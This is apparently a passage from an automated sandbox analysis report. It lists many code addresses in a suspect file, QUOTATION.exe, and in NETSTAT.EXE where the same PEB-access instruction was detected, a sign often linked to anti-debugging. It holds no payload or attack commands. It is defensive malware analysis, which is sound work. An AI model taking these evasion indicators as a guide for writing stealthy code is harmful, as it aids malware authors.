Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01004D3B mov eax, dword ptr fs:[00000030h] 17_2_01004D3B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A8D34 mov eax, dword ptr fs:[00000030h] 17_2_010A8D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01013D43 mov eax, dword ptr fs:[00000030h] 17_2_01013D43
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01053540 mov eax, dword ptr fs:[00000030h] 17_2_01053540
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01083D40 mov eax, dword ptr fs:[00000030h] 17_2_01083D40
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE849B mov eax, dword ptr fs:[00000030h] 17_2_00FE849B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01002581 mov eax, dword ptr fs:[00000030h] 17_2_01002581
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFB477 mov eax, dword ptr fs:[00000030h] 17_2_00FFB477
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01092D82 mov eax, dword ptr fs:[00000030h] 17_2_01092D82
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF746D mov eax, dword ptr fs:[00000030h] 17_2_00FF746D
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100FD9B mov eax, dword ptr fs:[00000030h] 17_2_0100FD9B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010035A1 mov eax, dword ptr fs:[00000030h] 17_2_010035A1
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A05AC mov eax, dword ptr fs:[00000030h] 17_2_010A05AC
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01001DB5 mov eax, dword ptr fs:[00000030h] 17_2_01001DB5
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01056DC9 mov eax, dword ptr fs:[00000030h] 17_2_01056DC9
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01056DC9 mov ecx, dword ptr fs:[00000030h] 17_2_01056DC9
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109FDE2 mov eax, dword ptr fs:[00000030h] 17_2_0109FDE2
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01088DF1 mov eax, dword ptr fs:[00000030h] 17_2_01088DF1
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A740D mov eax, dword ptr fs:[00000030h] 17_2_010A740D
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01091C06 mov eax, dword ptr fs:[00000030h] 17_2_01091C06
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01056C0A mov eax, dword ptr fs:[00000030h] 17_2_01056C0A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FED5E0 mov eax, dword ptr fs:[00000030h] 17_2_00FED5E0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100BC2C mov eax, dword ptr fs:[00000030h] 17_2_0100BC2C
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100A44B mov eax, dword ptr fs:[00000030h] 17_2_0100A44B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0106C450 mov eax, dword ptr fs:[00000030h] 17_2_0106C450
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD2D8A mov eax, dword ptr fs:[00000030h] 17_2_00FD2D8A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100AC7B mov eax, dword ptr fs:[00000030h] 17_2_0100AC7B
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFC577 mov eax, dword ptr fs:[00000030h] 17_2_00FFC577
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01094496 mov eax, dword ptr fs:[00000030h] 17_2_01094496
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FF7D50 mov eax, dword ptr fs:[00000030h] 17_2_00FF7D50
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE3D34 mov eax, dword ptr fs:[00000030h] 17_2_00FE3D34
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDAD30 mov eax, dword ptr fs:[00000030h] 17_2_00FDAD30
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A8CD6 mov eax, dword ptr fs:[00000030h] 17_2_010A8CD6
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010914FB mov eax, dword ptr fs:[00000030h] 17_2_010914FB
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h] 17_2_01056CF0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h] 17_2_01056CF0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01056CF0 mov eax, dword ptr fs:[00000030h] 17_2_01056CF0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A070D mov eax, dword ptr fs:[00000030h] 17_2_010A070D
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A070D mov eax, dword ptr fs:[00000030h] 17_2_010A070D
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100A70E mov eax, dword ptr fs:[00000030h] 17_2_0100A70E
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100A70E mov eax, dword ptr fs:[00000030h] 17_2_0100A70E
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0106FF10 mov eax, dword ptr fs:[00000030h] 17_2_0106FF10
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0106FF10 mov eax, dword ptr fs:[00000030h] 17_2_0106FF10
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE76E2 mov eax, dword ptr fs:[00000030h] 17_2_00FE76E2
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100E730 mov eax, dword ptr fs:[00000030h] 17_2_0100E730
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A8F6A mov eax, dword ptr fs:[00000030h] 17_2_010A8F6A
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h] 17_2_00FFAE73
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h] 17_2_00FFAE73
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h] 17_2_00FFAE73
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h] 17_2_00FFAE73
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFAE73 mov eax, dword ptr fs:[00000030h] 17_2_00FFAE73
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01057794 mov eax, dword ptr fs:[00000030h] 17_2_01057794
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01057794 mov eax, dword ptr fs:[00000030h] 17_2_01057794
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01057794 mov eax, dword ptr fs:[00000030h] 17_2_01057794
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE766D mov eax, dword ptr fs:[00000030h] 17_2_00FE766D
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h] 17_2_00FE7E41
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h] 17_2_00FE7E41
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h] 17_2_00FE7E41
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h] 17_2_00FE7E41
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h] 17_2_00FE7E41
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE7E41 mov eax, dword ptr fs:[00000030h] 17_2_00FE7E41
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDE620 mov eax, dword ptr fs:[00000030h] 17_2_00FDE620
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010137F5 mov eax, dword ptr fs:[00000030h] 17_2_010137F5
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h] 17_2_00FDC600
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h] 17_2_00FDC600
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FDC600 mov eax, dword ptr fs:[00000030h] 17_2_00FDC600
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01008E00 mov eax, dword ptr fs:[00000030h] 17_2_01008E00
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01091608 mov eax, dword ptr fs:[00000030h] 17_2_01091608
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100A61C mov eax, dword ptr fs:[00000030h] 17_2_0100A61C
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0100A61C mov eax, dword ptr fs:[00000030h] 17_2_0100A61C
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0108FE3F mov eax, dword ptr fs:[00000030h] 17_2_0108FE3F
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109AE44 mov eax, dword ptr fs:[00000030h] 17_2_0109AE44
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0109AE44 mov eax, dword ptr fs:[00000030h] 17_2_0109AE44
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FE8794 mov eax, dword ptr fs:[00000030h] 17_2_00FE8794
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0106FE87 mov eax, dword ptr fs:[00000030h] 17_2_0106FE87
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FEFF60 mov eax, dword ptr fs:[00000030h] 17_2_00FEFF60
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010546A7 mov eax, dword ptr fs:[00000030h] 17_2_010546A7
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h] 17_2_010A0EA5
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h] 17_2_010A0EA5
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A0EA5 mov eax, dword ptr fs:[00000030h] 17_2_010A0EA5
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FEEF40 mov eax, dword ptr fs:[00000030h] 17_2_00FEEF40
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFB73D mov eax, dword ptr fs:[00000030h] 17_2_00FFB73D
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFB73D mov eax, dword ptr fs:[00000030h] 17_2_00FFB73D
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_01018EC7 mov eax, dword ptr fs:[00000030h] 17_2_01018EC7
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0108FEC0 mov eax, dword ptr fs:[00000030h] 17_2_0108FEC0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010036CC mov eax, dword ptr fs:[00000030h] 17_2_010036CC
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD4F2E mov eax, dword ptr fs:[00000030h] 17_2_00FD4F2E
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FD4F2E mov eax, dword ptr fs:[00000030h] 17_2_00FD4F2E
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010A8ED6 mov eax, dword ptr fs:[00000030h] 17_2_010A8ED6
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_010016E0 mov ecx, dword ptr fs:[00000030h] 17_2_010016E0
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_00FFF716 mov eax, dword ptr fs:[00000030h] 17_2_00FFF716
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0330131B mov eax, dword ptr fs:[00000030h] 24_2_0330131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A309 mov eax, dword ptr fs:[00000030h] 24_2_0326A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0324DB60 mov ecx, dword ptr fs:[00000030h] 24_2_0324DB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03273B7A mov eax, dword ptr fs:[00000030h] 24_2_03273B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03273B7A mov eax, dword ptr fs:[00000030h] 24_2_03273B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0324DB40 mov eax, dword ptr fs:[00000030h] 24_2_0324DB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03318B58 mov eax, dword ptr fs:[00000030h] 24_2_03318B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0324F358 mov eax, dword ptr fs:[00000030h] 24_2_0324F358
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03274BAD mov eax, dword ptr fs:[00000030h] 24_2_03274BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03274BAD mov eax, dword ptr fs:[00000030h] 24_2_03274BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03274BAD mov eax, dword ptr fs:[00000030h] 24_2_03274BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03315BA5 mov eax, dword ptr fs:[00000030h] 24_2_03315BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03251B8F mov eax, dword ptr fs:[00000030h] 24_2_03251B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03251B8F mov eax, dword ptr fs:[00000030h] 24_2_03251B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032FD380 mov ecx, dword ptr fs:[00000030h] 24_2_032FD380
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03272397 mov eax, dword ptr fs:[00000030h] 24_2_03272397
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0327B390 mov eax, dword ptr fs:[00000030h] 24_2_0327B390
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0330138A mov eax, dword ptr fs:[00000030h] 24_2_0330138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h] 24_2_032703E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h] 24_2_032703E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h] 24_2_032703E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h] 24_2_032703E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h] 24_2_032703E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032703E2 mov eax, dword ptr fs:[00000030h] 24_2_032703E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032F23E3 mov ecx, dword ptr fs:[00000030h] 24_2_032F23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032F23E3 mov ecx, dword ptr fs:[00000030h] 24_2_032F23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032F23E3 mov eax, dword ptr fs:[00000030h] 24_2_032F23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326DBE9 mov eax, dword ptr fs:[00000030h] 24_2_0326DBE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032C53CA mov eax, dword ptr fs:[00000030h] 24_2_032C53CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032C53CA mov eax, dword ptr fs:[00000030h] 24_2_032C53CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03284A2C mov eax, dword ptr fs:[00000030h] 24_2_03284A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03284A2C mov eax, dword ptr fs:[00000030h] 24_2_03284A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h] 24_2_0326A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h] 24_2_0326A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h] 24_2_0326A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h] 24_2_0326A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h] 24_2_0326A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h] 24_2_0326A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h] 24_2_0326A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h] 24_2_0326A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0326A229 mov eax, dword ptr fs:[00000030h] 24_2_0326A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0330AA16 mov eax, dword ptr fs:[00000030h] 24_2_0330AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0330AA16 mov eax, dword ptr fs:[00000030h] 24_2_0330AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03258A0A mov eax, dword ptr fs:[00000030h] 24_2_03258A0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0324AA16 mov eax, dword ptr fs:[00000030h] 24_2_0324AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0324AA16 mov eax, dword ptr fs:[00000030h] 24_2_0324AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03245210 mov eax, dword ptr fs:[00000030h] 24_2_03245210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03245210 mov ecx, dword ptr fs:[00000030h] 24_2_03245210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03245210 mov eax, dword ptr fs:[00000030h] 24_2_03245210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03245210 mov eax, dword ptr fs:[00000030h] 24_2_03245210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03263A1C mov eax, dword ptr fs:[00000030h] 24_2_03263A1C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032FB260 mov eax, dword ptr fs:[00000030h] 24_2_032FB260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032FB260 mov eax, dword ptr fs:[00000030h] 24_2_032FB260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0328927A mov eax, dword ptr fs:[00000030h] 24_2_0328927A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03318A62 mov eax, dword ptr fs:[00000030h] 24_2_03318A62
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03249240 mov eax, dword ptr fs:[00000030h] 24_2_03249240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03249240 mov eax, dword ptr fs:[00000030h] 24_2_03249240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03249240 mov eax, dword ptr fs:[00000030h] 24_2_03249240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03249240 mov eax, dword ptr fs:[00000030h] 24_2_03249240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0330EA55 mov eax, dword ptr fs:[00000030h] 24_2_0330EA55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032D4257 mov eax, dword ptr fs:[00000030h] 24_2_032D4257
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h] 24_2_032452A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h] 24_2_032452A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h] 24_2_032452A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h] 24_2_032452A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_032452A5 mov eax, dword ptr fs:[00000030h] 24_2_032452A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0325AAB0 mov eax, dword ptr fs:[00000030h] 24_2_0325AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0325AAB0 mov eax, dword ptr fs:[00000030h] 24_2_0325AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0327FAB0 mov eax, dword ptr fs:[00000030h] 24_2_0327FAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0327D294 mov eax, dword ptr fs:[00000030h] 24_2_0327D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0327D294 mov eax, dword ptr fs:[00000030h] 24_2_0327D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03272AE4 mov eax, dword ptr fs:[00000030h] 24_2_03272AE4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03304AEF mov eax, dword ptr fs:[00000030h] 24_2_03304AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03272ACB mov eax, dword ptr fs:[00000030h] 24_2_03272ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03264120 mov eax, dword ptr fs:[00000030h] 24_2_03264120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03264120 mov eax, dword ptr fs:[00000030h] 24_2_03264120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03264120 mov eax, dword ptr fs:[00000030h] 24_2_03264120
